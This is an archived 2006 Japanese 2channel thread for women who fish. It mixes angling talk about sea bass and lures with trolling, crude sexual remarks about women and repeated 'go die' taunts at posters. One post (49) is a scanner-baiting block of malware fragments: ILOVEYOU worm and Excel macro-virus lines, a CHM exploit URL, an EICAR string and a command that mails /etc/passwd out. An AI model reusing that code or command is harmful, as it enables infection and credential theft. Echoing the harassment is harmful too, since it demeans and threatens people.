5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

女性で釣り好きな人専用スレ【part2】

1 :美紀:2006/10/25(水) 06:31:33 O
何でもOKだよ(*^-^)b

2 :名無し三平:2006/10/25(水) 07:47:00 0
ヽ(`Д´)ノ   ボ
  .ヽ`Д´)   ッ
  (ヽ`Д).  キ
  (  ヽ`)   ア
  (   ヽ   ゲ
 ヽ(   )ノ.  ス
  .ヽ   )  ペ
  (ヽ  )   シ
  (Д´ヽ) .  ャ
  (`Д´ヽ  ル
 ヽ(`Д´)ノ   ト
  .ヽ`Д´)   ル
  (ヽ`Д).  ネ
  (  ヽ`)   l
  (   ヽ   ド
 ヽ(   )ノ.  サ
  .ヽ   )  イ
  (ヽ  )   ク
  (Д´ヽ) .  ロ
  (`Д´ヽ  ン
 ヽ(`Д´)ノ   ! !

3 :独眼流 丸山:2006/10/25(水) 07:50:06 0
13匹目の 3 釣り上げ!  ( v゚▽゚)o イエーイ♪

4 :美紀:2006/10/25(水) 08:09:19 O
>>2
マジうけるぅ〜♪

5 :名無し三平:2006/10/25(水) 13:04:50 O
age

6 :名無し三平:2006/10/25(水) 13:17:57 O
ageage

7 :名無し三平:2006/10/25(水) 13:21:43 O
>>4
美紀キモい

8 :名無し三平:2006/10/25(水) 13:26:14 0
>>1


てめえら>>1に感謝しろやー!!

9 :名無し三平:2006/10/25(水) 13:27:54 0
女の釣り師といえばどっちだ?

水野 VS 白石

10 :名無し三平:2006/10/25(水) 13:39:50 O
>>9
女釣り師といえば美紀タンかと・・・

11 :名無し三平:2006/10/25(水) 13:44:25 0
釣りロマンの児島玲子ってなかなかやるんじゃねえの? 

12 :名無し三平:2006/10/25(水) 13:46:05 0
>>11
釣れた時「キャー」とか騒がないしね

13 :名無し三平:2006/10/25(水) 13:48:09 O
いずみんは?

14 :名無し三平:2006/10/25(水) 13:49:36 O
>>11
昔ブルセラ雑誌のクリームでブルセラモデルしてたなぁ…

15 :名無し三平:2006/10/25(水) 13:54:50 0
児島玲子 オフィシャルホームページ
http://www.ne.jp/asahi/reiko/kojima/

昔の写真
http://www.mito.ne.jp/~eri8/po-a-a-kojima.htm

そそりますな〜

16 :名無し三平:2006/10/25(水) 14:07:08 O
児島玲子はクリーム出てた時、セーラー服M字開脚とスクール水着バックスタイルの2点で、はっきりと愛液のシミがついてたね。

なんか懐かしいな。

17 :名無し三平:2006/10/25(水) 14:08:36 0
>>13
いずみんてダレっすか?

18 :名無し三平:2006/10/25(水) 14:15:55 O
>>17
釣りスレで

いずみん

で検索したらスレあるよ

19 :名無し三平:2006/10/25(水) 14:21:21 0
いずみん、萌えます。

20 :名無し三平:2006/10/25(水) 14:21:54 O
いずみん可愛いよね

21 :名無し三平:2006/10/25(水) 15:09:18 0
児島玲子は最初の頃は、ナンだこいつ?と思ってたが
知らんうちにサマになってきたな。


22 :名無し三平:2006/10/25(水) 16:41:38 0
昨日から随分とスレ伸びたね。
他にもネカマじゃない女釣り師いたんだw

PART2はまた〜り行きましょう。

23 ::2006/10/25(水) 17:09:46 0
いや、女に限らず男もOKでしょ。
今回はコテスルーの方向でヨロ

24 :名無し三平:2006/10/25(水) 21:14:08 0
だれかが女と言った時点で荒らします


25 :名無し三平:2006/10/25(水) 21:37:45 O


26 :美紀:2006/10/25(水) 21:40:26 O
私は女だよ
>>24荒らせるものなら荒らしてみなさいよー♪

27 :24:2006/10/25(水) 21:40:47 0
>>25
お前のせいで2レス荒れたww
ありがとう

28 :名無し三平:2006/10/25(水) 21:41:14 0
>>26
また2レス荒れた
またまたありがとう

29 :美紀:2006/10/25(水) 21:49:24 O
>>27>>28
楽しいの?馬鹿にしか見えないよ♪

30 :名無し三平:2006/10/25(水) 21:50:28 O
美紀と言う名前、ここではNGワード確定だな。
この名がでるだけで荒れるからスルー推奨。
ご本人には残念かも知れないがもし見てるなら名無しで参加してよ。

31 :名無し三平:2006/10/25(水) 21:52:10 0
コレステロール

32 :名無し三平:2006/10/25(水) 21:52:10 0
>>29
もう一回荒れたw
もっと煽ってくれ

33 :美紀:2006/10/25(水) 21:53:07 O
>>30
キモいんだけど♪

34 :名無し三平:2006/10/25(水) 21:55:45 0
>>33
お前が最高にキモイね

35 :美紀:2006/10/25(水) 21:56:52 O
>>31
本当につまんない♪本人は面白いつもりだよね?

36 :美紀:2006/10/25(水) 21:59:31 O
>>32
マゾ男キモいんだけど♪

37 :美紀:2006/10/25(水) 22:05:06 O
女専用スレにくる男って何か変だよね♪面白くないし

38 :名無し三平:2006/10/25(水) 22:11:06 0
以前他の板で女と知り合った
女って言ってても、どうせ皆ネカマだと思ってた
スレの中では半年以上も女だと言い張ってた
ちょっと理由があって俺のフリメを教えた
当然そのアドレスはすぐ捨てるつもりだったんだ

返信は携帯の本アドだった・・・・
馬鹿なんじゃないかと思った
すぐアドレス変えるつもりかとも思った
聞いたら俺のことが信用できると思ったと返ってきた
それから1ヶ月メールをしあってたんだけど本当に気になって聞いてみたんだ
「お前本当に女なの?本当だったら携帯番号晒すから電話してみ」
2台携帯もってて間もなく解約するつもりだったから本気で晒すつもりだった
返答は・・・・その女の携帯番号が書いてあったんだ
もう本当の馬鹿だとしか思えない
俺も混乱していたのかなぜか電話せずに自分の携帯番号を教えちまった
それも仕事で使ってるやつな
即かかってきたよ それも朝の4時に・・・・よっぽどのブスかとデブかと思っちまったぜ
当然小心者の俺は無言で電話をとったぜ
「もしも〜し、もしも〜し○○(俺の当時のコテ名)」
ちょっwww本当の女だ!!!当然即電話切ってやったぜ

それでも色々あって今は俺のとなりに寝てるんだけどな

39 :名無し三平:2006/10/25(水) 22:17:12 O
居るか居ないかわかんないけど釣り好き女性なおまいさん方と話したいから強引に話題投下さあw

おまいさん方のレコードフィッシュってなんなんだぜ?サイズでも数でも思い出の魚でも何でもいいから語ってみないか?
ちなみに話を振った自分はたぶんシーバス74cm

おっと、自慢厨乙とか言うの無しねw泣くからw

40 :名無し三平:2006/10/25(水) 22:18:42 0
>>39
全員ネカマですたwww

41 :美紀:2006/10/25(水) 22:50:45 O
もっと面白い話してよ♪

42 :名無し三平:2006/10/25(水) 22:54:39 0
すんません。
ネカマ ってなんですか?

43 :美紀:2006/10/25(水) 23:08:32 O
ネカマってネットオカマの略じゃない?

44 :美紀:2006/10/25(水) 23:16:02 O
なんかつまんないねここって♪バィバィ

45 :名無し三平:2006/10/26(木) 00:30:24 O
釣り帰りの前スレ907です。
サーフでヒラメが釣れたさー明日はごちそうだ。
新スレ立ってたんだ…しかも微妙に荒れてますな。
コテスルー、荒らしスルーでまったり行くといいんだけど…ていうかそうしたい。

46 :名無し三平:2006/10/26(木) 01:28:40 0
なんか二代目携帯厨房美紀って、すごい興奮状態だね。
他人事ながら、マジで少し心配になってきたw

47 :名無し三平:2006/10/26(木) 01:46:56 0
>>45
ヒラメgetおめでと。関西はもう釣りいけるんだね。
関東は今日も強風さ。でも明日はなんとか行けそう。
自分もなんか釣れるといいけどw

48 :名無し三平:2006/10/26(木) 04:55:57 0
>>45
死ねよ
何もいわずに首つってこいよ

49 :[名無し]さん(bin+cue).rar:2006/10/26(木) 07:15:54 0
kak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

50 :名無し三平:2006/10/26(木) 10:13:56 O
てすと

51 :名無し三平:2006/10/26(木) 10:31:34 O
なんかここおかしくない?
携帯からだと>>49が文字化け、PCからだと>>47が文字化けで
>>48>>49が抜けてるんだけど。


52 :名無し三平:2006/10/26(木) 10:57:29 0
児島玲子を見習えってんだ!

53 :名無し三平:2006/10/26(木) 11:06:13 0
ココ、ウイルスに汚染されてるんじゃない
アクセスしたら

Unix.Penguin

があるって、警告が出てきたよ

54 :名無し三平:2006/10/26(木) 11:08:30 0
>>53
通報しました。

55 :名無し三平:2006/10/26(木) 11:18:29 0
とりあえずネタ提供します↓

桜井いずみVS児島玲子

56 :名無し三平:2006/10/26(木) 20:16:31 O
>>55
それと、ここのスレタイとどうゆう関係が?

57 :名無し三平:2006/10/27(金) 03:24:45 O
ノートンを窓から投げ捨てろ

58 :名無し三平:2006/10/27(金) 06:10:39 0

>110>156>200>62>108>142>43>154>16>178>38>146>199>63>85>143>95>190>48>25
>34>56>118>3>5>145>80>49>101>61>11>114>169>177>160>50>58>158>91>124
>121>131>26>144>14>170>94>172>32>86>163>9>198>109>8>133>77>70>30>81
>196>123>148>140>71>152>89>33>87>99>161>60>67>188>23>19>51>57>182>120
>128>117>194>162>100>192>127>147>103>65>41>4>78>18>84>175>12>69>1>29
>119>159>46>164>136>113>171>167>126>165>96>130>138>98>97>83>193>186>180>195
>102>28>184>112>20>134>73>125>174>129>137>44>187>139>53>151>24>106>92>153
>68>157>155>54>150>166>36>181>72>90>197>88>76>116>35>183>59>105>141>7
>122>107>75>168>21>31>173>17>111>37>179>10>52>115>27>93>132>82>104>64
>13>176>74>22>79>189>55>66>45>15>135>47>191>39>185>6>2>40>149>42
>110>156>200>62>108>142>43>154>16>178>38>146>199>63>85>143>95>190>48>25
>34>56>118>3>5>145>80>49>101>61>11>114>169>177>160>50>58>158>91>124
>121>131>26>144>14>170>94>172>32>86>163>9>198>109>8>133>77>70>30>81
>196>123>148>140>71>152>89>33>87>99>161>60>67>188>23>19>51>57>182>120
>128>117>194>162>100>192>127>147>103>65>41>4>78>18>


59 :名無し三平:2006/10/27(金) 07:14:37 O
>>57
携帯だからノートン関係ないし・・・
番号とんでるじゃん

>>58
わけわからん

60 :名無し三平:2006/10/29(日) 16:40:21 O
誰か新スレ立て直してくれ

61 :名無し三平:2006/10/31(火) 02:36:53 0
         ___ 
         | ガ   | 
         |  ン   | 
         |  ヲ  | 
         |  タ   | 
      ,,,.   | 之 | ,'"';, 
    、''゙゙;、).  | 墓 | 、''゙゙;、),、 
     ゙''!リ'' i二二二二!゙''l!リ'''゙ 
     ‖  `i二二二!´ ‖ 
     昌 |: ̄ ̄ ̄ ̄:| 昌 
    | ̄:|_|;;;l"二二゙゙l;;|_| ̄:| 
    |  :|::::::| |;;;;;;;;;;| |::::|  :| 
    |  :|::::::|┌─┐|::::|  :| 
 ./゙゙└‐┴ ┴l,,,,,,,,,,l┴┴‐┘゙゙゙゙\ 
 | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄| 
  ̄|三|三三|三三三三|三三|三| ̄ 
   |  |:::  |: :    : : |::   |  | 
   |  |:::  |: :    : : |::   |  | 
  /_|:::  |: :     : :.|::  :|_ヽ 
 _|___|;;;;;;;;;;|,;,;,,,,,,,,,,,,,,,;,;,|;;;;;;;;;;|___|_ 
 l;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;l 
釣り板の伝説ガンヲタを祀るスレ
http://sports9.2ch.net/test/read.cgi/fish/1162229591/l50


62 :名無し三平:2006/11/01(水) 00:59:52 O
過疎ってるねぇ…ま、当然か。

63 :名無し三平:2006/11/01(水) 11:25:53 0
釣りやってる女子、2ちゃんやってる女子なんてあんまいないんだから、
嘘でもなんでも付き合ってあげればよかったのにね。今更だけんど。

64 :名無し三平:2006/11/02(木) 07:23:27 O
あれ、PCから書き込めるんだ?
漏れはノートン切る勇気ないのでこのスレには
書き込めないんだよな〜orz

65 :名無し三平:2006/11/03(金) 20:07:52 0
2〜3回ウィルス引っ張ってきたらもう引っかかることは無いと思う。


66 :名無し三平:2006/11/07(火) 02:02:02 O
やはりこのスレは消える運命だったんだなw
早くdat落ちしてくれって感じ

67 :名無し三平:2006/11/07(火) 15:56:38 O
本当に必要ならまた立てるだろ。
このスレはぶっちゃけ落ちた方がいいと思う。

68 :名無し三平:2006/11/08(水) 22:10:51 O




プッ

69 :名無し三平:2006/11/12(日) 11:34:49 O
age



プッ

70 :名無し三平:2006/11/13(月) 21:00:44 O
美紀タンは?

71 :名無し三平:2006/11/15(水) 17:30:11 O
美紀タンは?

72 :名無し三平:2006/11/15(水) 18:26:42 0
釣り板のコテ「ガンオタ」の特徴

1、文章が非常に読みづらい
2、意味不明なコピペを様々なスレに繰り返す
3、自分を貶す人間は1人のみの自作自演だと思ってる
4、どう見ても暇人
5、どう見ても基地外
6、煽られたら反応せずにいられない
7、何故か電動リールにも反応する
8、恥ずかしいコテ名に気づいていない
9、正直気持ち悪い
10、自分だけはマトモだと思っている

あなたの見つけたガンオタはいくつ該当していますか?
そう、これがガンオタクオリティー


73 :名無し三平:2006/11/15(水) 18:46:21 O




ふぅ〜ん

74 :名無し三平:2006/11/16(木) 15:23:57 0
>>72
オマエも似たような者だぞ

75 :名無し三平:2006/11/16(木) 21:12:10 O




たしかに…

76 :名無し三平:2006/11/19(日) 19:09:19 0
   ,. -‐''' ー- 、ヽ‐---、::::::::\ ヽ、 i、
        / ´ ̄  ̄``ヾ lヽ、`'ー゙::::::::::::::;> Y′ 
 ト、   /            `ヾ、=;r‐<´ヽ. ヽ.l、   
-'ー゙-v':   ゙´ ̄ ミ =ミ:.、. 、\.\ヾ゙;、 ヽヾヽ |     
 」::--三'      ミ: 、 >、ミ;、ヽ ヽ. ヽヽト、 lハヽ|     
,..<,r:'´        、/;;r:''"ヾ;ト、ヽ.ヽ ヾ;ト、.`             ,. -_;'ニニ;_ 、_ 
::://,      ヽ、ベ、ミ;''ヽ;、__ノ;ゝl; ヽl」Lヽ〃rへ;_>=-‐‐.、  /./       `ヽヽ、_ 
::l// ,'    ヽ、 ヾ;ヽ   ``'´ /,>‐''" ̄__,,.. --‐''"У/::.           ヾー-`'=ー-、 
//.! |. ,   ヽ,.ヽト、,、      // ,.r '' "´    ̄ ̄ , イ ./:::::.:.           i     `ヽ.\
|:! .| .!i l  、 :ヽト、!l'゙`ヽ,ヽ / /   /    ,     ,.-‐/ / //:::::.           |      ゙、.l 
  ハ レl ',   \ヾミヽゞ=イ   /  ./   ./   | ./´ ./.' ! |,'::::::::.:.           /       l l,
 /ハVい、 ':, `ヾミ、ー>-‐:| ./   /  /_|/  /  | j'::::::::::.:.         .,.イ:::.       .! |
 !.| |`トlヽヽ ヽ  ヽ`ヾ:;\| /  ,.'  //   |  ,'   .l ,'::::::::.:.:.        .:/:;::i::::.:.        | |
 |.ハ. l ',.', \ヽ,ヽ   `:.、 \〈  / _,. イ /   .|  !   ,' !::::::::.:.:.        .::;' / ノ::::.:.      i ,'
   ヾ、い  l::::/ヽ、  `ヽ、`j./´  / ,′  |  |  ,' .|:::::____        |:/::::.:.:       / |
     ヽヾ;、、l;ハ、-`ヽ、.  l   ノ /    .l  l. | .,'  「-―‐ ''"´二二二`' ー‐ - 、 __    / .l
      \ヽ-‐ヽ   ```` i / /  .,'  l、_ | .| .l  7"``::ー--===:;_三二_`'_ー-=`>-,イ  |

美紀たんハァハァ


77 :名無し三平:2006/11/28(火) 17:29:59 0
釣りをしたことがない女性が「釣りに行きたい」と言い出したのですがなに釣りに連れて行くのが良いでしょうか?
ちなみに東京在住です。

78 :名無し三平:2006/11/28(火) 17:38:27 O
やめとけ

79 :名無し三平:2006/11/28(火) 17:56:05 0
>>77
それは、「私を釣ってください」という事では?

釣はどこでもいいんじゃないの?その後においしく釣り上げれば。

80 :名無し三平:2006/11/28(火) 20:23:23 0
サビキ

81 :名無し三平:2006/11/29(水) 12:04:25 0
女の子なら虫餌よりエビ系、疑似餌とかだな

82 :名無し三平:2006/11/29(水) 12:09:01 O
男らしさをアピールするため、イワイソメだな ぶっとく長いやつ針にさして「俺のはこんなもんじゃないぜ!」で決まりだ!
コマセなんてバケツごと豪快に海に投げ入れて高笑いだ
男らしーm9(・∀・)

83 :名無し三平:2006/11/29(水) 19:10:25 O
お手軽さならサビキ。何かしらの魚は釣れるんじゃね?

餌が気持ち悪いorにおいがダメっていうんならルアーかねぇ。
ソルト用ルアーはきれいなカラー多いし。

84 :モモコ:2006/11/29(水) 19:18:11 O
これから釣りを始めようと思ってます
まず何から揃えればよろしいですか?

85 :名無し三平:2006/11/29(水) 19:20:56 O
>>84
先ずは釣り好きな男から揃えるがヨロシ!

86 :モモコ:2006/11/29(水) 19:33:06 O
釣れた!m9(^Д^)プギャー!

87 :名無し三平:2006/11/29(水) 19:52:06 O
自演かよw

88 :名無し三平:2006/11/29(水) 21:08:26 0
>>82>>87自演かよw

89 :名無し三平:2006/12/01(金) 13:46:22 0
真面目な話、夜釣りとかちょっと怖いよね?
かといってオフみたいなのは苦手だしさ。早朝とかも今の季節真っ暗で怖い。
こないだ深夜防波堤で一人でやってたらランタンも懐中電灯も何も持ってない人間があるいてきたから
道具放り出して逃げたよ。

荒れるかもしれないけど女子集めるために一回あげまっす

90 :名無し三平:2006/12/01(金) 13:49:23 0
釣りデートしたい・・・・

91 :名無し三平:2006/12/01(金) 14:18:47 0
夜釣りをだしに車の中で・・・

92 :名無し三平:2006/12/02(土) 15:46:04 0
釣りは一人で黙々とやりたい。
好きな人もしくは素敵な人となんかやったら気が散る。

93 :名無し三平:2006/12/02(土) 15:51:31 0
渓流釣りに誘われて、あのプニュプニュしたブドウ虫が
ハリに付けられず泣いてしまった・゚・(つД`)・゚・
イクラも用意しておいてくれたので、それで16cmくらいの
ヤマメを2匹釣った。

94 :名無し三平:2006/12/04(月) 02:38:53 0
滑り止め付き手袋があればなんでもつかめるわい

でもさあ、釣りの時は何でも掴めるのに日常の昆虫は怖いのよね。。。
とんぼ、ちょうちょ、セミ、ごきコワス

95 :あにす:2006/12/05(火) 17:20:16 0
>>94
じゃあ俺のチンコを掴んでくれよ

96 :名無し三平:2006/12/06(水) 23:11:06 0
いずみんカワイイ!
一押し!

97 :名無し三平:2006/12/07(木) 02:26:26 O
(*´д`*)

98 :名無し三平:2006/12/12(火) 20:09:15 O
この時期だとシーバス釣るのにルアーは何が良いんだろ?

99 :名無し三平:2006/12/12(火) 20:54:41 0
海の釣堀行ったお〜
竿をオマタにはさんで引きに耐えたのだ〜快感!


100 :名無し三平:2006/12/14(木) 21:12:40 0
女は狩猟採取のなかでも、釣りや鉄砲はあまりやらない。
それは危険だとか重労働だからということではない。
目のある生き物の殺生が嫌いなだけだろう。
クマの居るような山にも平気で山菜取りに行くし、
サザエやアワビを獲る海女にしても危険な重労働だ。

101 :名無し三平:2006/12/16(土) 20:32:04 0
あんまいないんだね(´・ω・`)

102 :名無し三平:2006/12/18(月) 14:25:07 0
釣り好きの女性は男の臭いがプンプンするよね。

103 :名無し三平:2006/12/18(月) 20:49:11 0
土曜日に私一人で子ども連れて行ったよ。
女だとトイレのない釣り場は不安で行けないから
釣行範囲が狭くなっちゃうのが残念だよね。

104 :名無し三平:2006/12/18(月) 21:53:48 0
釣り好きの女性にとっては、男も単なる釣りの獲物に過ぎない。

105 :名無し三平:2006/12/19(火) 11:17:27 0
>>103
子持ちは論外

106 :名無し三平:2006/12/19(火) 13:47:25 0
♀です。

女性釣り仲間がいなくて本当に寂しい。。。
いても休みが合わないとか。

女一人で船宿って変かな?まだ一人釣行はチャレンジしたことないんだけど。。

107 :名無し三平:2006/12/19(火) 13:52:25 0
よくね竿を股に挟んでクリに刺激を伝えて海で萌えてるんだけど
そんな私は変態なんですか?

108 :名無し三平:2006/12/19(火) 13:53:01 O
大丈夫じゃない?
多分 周りのオッサン達にチヤホヤされる予感がするけどw

109 :名無し三平:2006/12/19(火) 13:59:52 O
>>107
変態だね!
なんなら漏れが相手してあげるよw

110 :名無し三平:2006/12/19(火) 14:55:03 0
>>107
誰の竿を挟んでるの?w

111 :名無し三平:2006/12/19(火) 15:14:50 O
川シーバスの時期もぼちぼち終わりですな。

私はほとんど一人で釣りに行くけど集中してると怖さは無いよ。

好きな人とは行くのはちょっと微妙。着膨れしてノーメイクで鼻垂らしてる姿なんか見られたくない。

112 :名無し三平:2006/12/19(火) 15:21:10 0
>>111
その鼻水を啜ってくれるのが真実の愛ですよ。

113 :名無し三平:2006/12/19(火) 15:29:41 O
鼻から出ようがマン○から出ようが体液は彼女の一部だ、愛してやれよW

114 :名無し三平:2006/12/19(火) 16:20:40 0
ただの変態プレイじゃん・・・

115 :名無し三平:2006/12/20(水) 22:00:55 0
>>111
じゃあ死ねよ

116 :名無し三平:2006/12/21(木) 04:24:16 0
欧米では結構ポピュラーらしい女子用の立ちしょんの道具が欲しいのですが、
ネットで手にはいるところありますかね。

117 :名無し三平:2006/12/21(木) 04:48:22 O
>>116登山用品、アウトドア用品でぐぐってみては?

118 :名無し三平:2006/12/21(木) 16:21:21 0
>>116
俺の両手を貸してあげるよ。

119 :名無し三平:2006/12/21(木) 20:04:16 0
♀専用スレなのに、臭い童貞毒男しかいないのが悲しい。

女性アングラーがもっと増えればいいのになぁ。。。。

120 :名無し三平:2006/12/23(土) 12:11:48 O
下痢便垂れ流し女磯師w

121 :名無し三平:2006/12/23(土) 12:28:20 O
この時期の女との釣りはいいぞ

女の冷えた体は

122 :名無し三平:2006/12/24(日) 00:03:56 O
体が冷えすぎて卵巣が虫の餌になっちゃうよw
蛆が沸いて蝿が下痢便まみれのケツにたかるんだよw
ブサ女共気を付けろ!

123 : ◆SKmxD2MzBo :2006/12/24(日) 00:21:37 O
今日は、午後から久しぶりに港から河口と河川と廻りました。
暖かかったからかな、港で久しぶりに釣れましたょ。
測ったら48p、レンジバイブの赤金使用です。

124 :名無し三平:2006/12/24(日) 22:44:34 0
>>123
だったら死ねばいいと思うよ

125 :名無し三平:2006/12/25(月) 19:47:17 0
>>124
お前が死ね!

126 :名無し三平:2006/12/26(火) 15:57:50 0
>>123
(´・ェ・`)カワイソス

127 :名無し三平:2006/12/27(水) 02:58:12 0
>>119
いつから♀限定になったの?

128 :名無し三平:2006/12/27(水) 04:22:41 O
へ〜、こんな糞みてーな板にも女がいるとは驚き
物好きにも程があるんじゃねーの?

129 :名無し三平:2006/12/27(水) 04:29:49 0
釣り好き女=肉便器

130 : ◆SKmxD2MzBo :2006/12/27(水) 21:17:37 O
今夜はシーバス釣れなかったし寒かったぁ〜(^_^;)
夜はストラクチャーというか、船をつないでるロープみたいなのが見えない( ̄□ ̄;)!!
お気に入りルアーを二つ無くしちゃって(T^T)おまけにシーバス釣れないし(ToT)
でもマールアミーゴでソイとTKLMで太刀魚ゲット(o≧∇≦)o
年内に何とかシーバスゲットしたいな(*^-^)b

131 :名無し三平:2006/12/27(水) 22:52:49 O
>>130
だったら死ねばいいと思うよ

132 :名無し三平:2006/12/27(水) 22:59:30 O
>>130
太刀魚とソイが釣れれば十分じゃん。
つーか、夜より朝か夕方のマズメ狙いの短時間に集中して攻めた方がいいんじゃね。

133 :名無し三平:2006/12/27(水) 23:44:25 O
>>130
(´・ェ・`)カワイソス

134 :名無し三平:2006/12/28(木) 09:42:43 O
>>124 131
お前 ちょびちょび 出てくんな! どっかいけ!!

135 :名無し三平:2006/12/28(木) 12:06:05 0
>>130
キモイ

136 :名無し三平:2006/12/28(木) 15:59:37 0
>>130
aho

137 :名無し三平:2006/12/28(木) 16:03:59 O
(´・ω・`)カワイソス

138 :名無し三平:2006/12/28(木) 16:05:25 O
ネカマは処刑で良いかとW

139 :名無し三平:2006/12/28(木) 16:07:15 O
>>138
立派な殺害予告って事ですね?

140 :名無し三平:2006/12/28(木) 16:10:08 O
↑短絡思考だね
なにもリアルの事は言ってないよ
板から排除って意味だよ
ひろゆきたんに言い付けるなよW

141 :名無し三平:2006/12/28(木) 16:11:41 O
ミキタン…ハァハァ…

142 :名無し三平:2006/12/28(木) 16:13:12 O
>>140
必死でオモロい

143 :名無し三平:2006/12/28(木) 16:16:47 O
>>140
殺害予告撤回するのか?

144 :名無し三平:2006/12/28(木) 16:22:32 O
(´・ω・`)カワイソス

145 :名無し三平:2006/12/28(木) 16:29:09 O
必死ですよ
年末にお縄は嫌だしね
撤回でいいよ
「処刑」←×不適切レスでした
「ネカマは板から排除」←○
必死な俺がレス訂正に来ましたよ

146 :名無し三平:2006/12/28(木) 16:34:45 O
>>145
(´・ω・`)カワイソス

147 :名無し三平:2006/12/28(木) 16:40:01 O
>>145
(´・ω・`)オモシロス

148 :名無し三平:2006/12/28(木) 16:40:26 0
    ∧_∧∩
    ( ゚∀゚)彡 >>145の逮捕免除!やったね!
   ⊂ ⊂彡
    (つ ノ
     (ノ


149 :名無し三平:2006/12/28(木) 16:54:17 O
>>145
(*´д`*)ハァハァ

150 : ◆SKmxD2MzBo :2006/12/28(木) 21:46:18 O
>>132さん
太刀魚はトップでよく釣れるし、ソイはボトムでよく釣れますょ(^_^)v
朝は仕事に行く仕度とかでできません(T^T)
夕方は残業多いからなかなか帰れないし(T.T)
明日寒くなければシーバスにチャレンジします(*^-^)b

151 :名無し三平:2006/12/28(木) 23:23:56 O
>>152
シーバス是非頑張ってくだたい。
私も明日夕マズメ狙いでいってみる予定でつ。

152 :名無し三平:2006/12/28(木) 23:40:55 O
お オレ?(゚Д゚)

153 :名無し三平:2006/12/29(金) 10:00:49 O
(´・ω・`)ワロタ

154 : ◆SKmxD2MzBo :2006/12/29(金) 19:41:25 O
今日は昼間したけどシーバス釣れなかった(T^T)
結局夕方Mリグでしてキビレ一匹(≧▽≦)ゞ
明日こそシーバス釣りたいな(*^-^)b

155 :名無し三平:2006/12/29(金) 21:25:29 O
>>154
だったら死ねばいいと思うよ

156 :名無し三平:2006/12/29(金) 22:33:57 O
かなり嫌われてるのに気付かないんだね

157 :名無し三平:2006/12/30(土) 08:16:53 O
(´・ω・`)カワイソス

158 :名無し三平:2006/12/30(土) 10:03:21 O
>154
キビレ釣れれば上等じゃん。
ある意味シーバスより凄い。

159 : ◆SKmxD2MzBo :2006/12/30(土) 15:53:01 O
>>158さん
ありがとうございます(^_^)vキビレはこの時期釣りにくいけど、夏〜秋なら毎回4〜5匹釣れました。
先月も私が1匹釣る間に、中学生の男の子二人組が4匹釣ってたんです。凄く上手いなぁ〜って。

今日は今年最後のシーバス釣りにチャレンジしたけど、何も釣れなかった(T^T)
今からルアーを大掃除します。水洗いしてフック交換します。一年間ありがとう、来年もよろしくねって(*^-^)b

160 :名無し三平:2006/12/30(土) 16:04:02 0
>>159
だったら死ねばいいと思うよ

161 :名無し三平:2006/12/30(土) 16:07:16 O
(´・ω・`)カワイソス

162 :名無し三平:2006/12/30(土) 16:09:58 O
かなり嫌われてるのに気付かないんだね

163 : ◆SKmxD2MzBo :2006/12/30(土) 17:55:02 O
( ̄□ ̄;)!!ガァ〜ン

164 :オキアミブロック:2006/12/30(土) 18:10:08 0
     l'´ ̄`l ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄`l
    |   | u                |
    |   |     ヽ      /       |  ああ〜
     |  :J |   ●  ヽ----/   ●  |
...   |   |         ヽ  /       |  やっは°釣り好き女の
.    |   |           ヽ/       |
.     |   |                J   |   シマリはいいYO!〜
..   |   |                      |
    |  \               __    ト、
   ミ    \  ,.ミ'´ ̄ ̄``    `ヽ、| |
((  ミ   ミ  \'         、    ヽ|          力
   ミ、  ミ    \           i.     ゙、           勹
   |   ミ、 ,'                l
    L.___|_ l                l {    -─- 、
      |    l    -、         ヽ   ,. '´       ヽ
     |     !       ヽ         ヽ ,.'        ,、  ヽ
    ./´ ̄`V      ,ヽ、          ,' ,'  ; ,.  ,: , ハ :, , i
    / 、  |      /  、`ー     ノ! ; : ; /_'/./_/  Li_l  !
   ./   i   |       /   ヽ   ヽ 〃 /  | ;:「 ____...    リjリ
   !.     !     /     ヽ   {{ / (`| il| __..   ` ̄lノ i Σ
   `ー‐ゝ、 '    /      ヽ___,.-‐'"⌒゙| !| °,,,  ,  ̄/,: ハ
       `ー--‐'     ,. -‐'"´     リi从_   、 '''ノ_:_ノ ヽ
   力          /"ー─------<二/  ´ヽ、-<r"/,ー、 丿
     勹      { 〈                )、 Y  `ゝ(_/_/./'






165 : ◆SKmxD2MzBo :2006/12/30(土) 19:12:57 O
* ̄0 ̄)ノ ゴラァ〜

166 :名無し三平:2006/12/31(日) 12:38:23 0
>>159
九州は、キビレが沢山釣れていいですな。
関東方面じゃチヌ系の魚はエサで釣るのも難しい。

